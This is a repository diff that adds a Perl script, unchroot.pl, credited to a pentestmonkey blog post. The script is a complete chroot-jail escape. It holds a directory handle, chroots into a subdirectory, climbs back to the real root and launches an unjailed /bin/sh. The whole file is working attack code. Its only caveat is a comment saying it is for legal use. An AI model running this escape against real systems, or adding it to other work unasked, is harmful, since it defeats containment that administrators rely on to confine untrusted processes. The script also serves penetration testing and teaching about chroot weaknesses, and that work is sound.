diff options
Diffstat (limited to 'src/tools/unchroot.pl')
-rwxr-xr-x | src/tools/unchroot.pl | 33 |
1 files changed, 33 insertions, 0 deletions
diff --git a/src/tools/unchroot.pl b/src/tools/unchroot.pl new file mode 100755 index 000000000..bd30ffe76 --- /dev/null +++ b/src/tools/unchroot.pl | |||
@@ -0,0 +1,33 @@ | |||
1 | #!/usr/bin/perl -w | ||
2 | use strict; | ||
3 | # unchroot.pl Dec 2007 | ||
4 | # http://pentestmonkey.net/blog/chroot-breakout-perl | ||
5 | |||
6 | # This script may be used for legal purposes only. | ||
7 | |||
8 | # Go to the root of the jail | ||
9 | chdir "/"; | ||
10 | |||
11 | # Open filehandle to root of jail | ||
12 | opendir JAILROOT, "." or die "ERROR: Couldn't get file handle to root of jailn"; | ||
13 | |||
14 | # Create a subdir, move into it | ||
15 | mkdir "mysubdir"; | ||
16 | chdir "mysubdir"; | ||
17 | |||
18 | # Lock ourselves in a new jail | ||
19 | chroot "."; | ||
20 | |||
21 | # Use our filehandle to get back to the root of the old jail | ||
22 | chdir(*JAILROOT); | ||
23 | |||
24 | # Get to the real root | ||
25 | while ((stat("."))[0] != (stat(".."))[0] or (stat("."))[1] != (stat(".."))[1]) { | ||
26 | chdir ".."; | ||
27 | } | ||
28 | |||
29 | # Lock ourselves in real root - so we're not really in a jail at all now | ||
30 | chroot "."; | ||
31 | |||
32 | # Start an un-jailed shell | ||
33 | system("/bin/sh"); | ||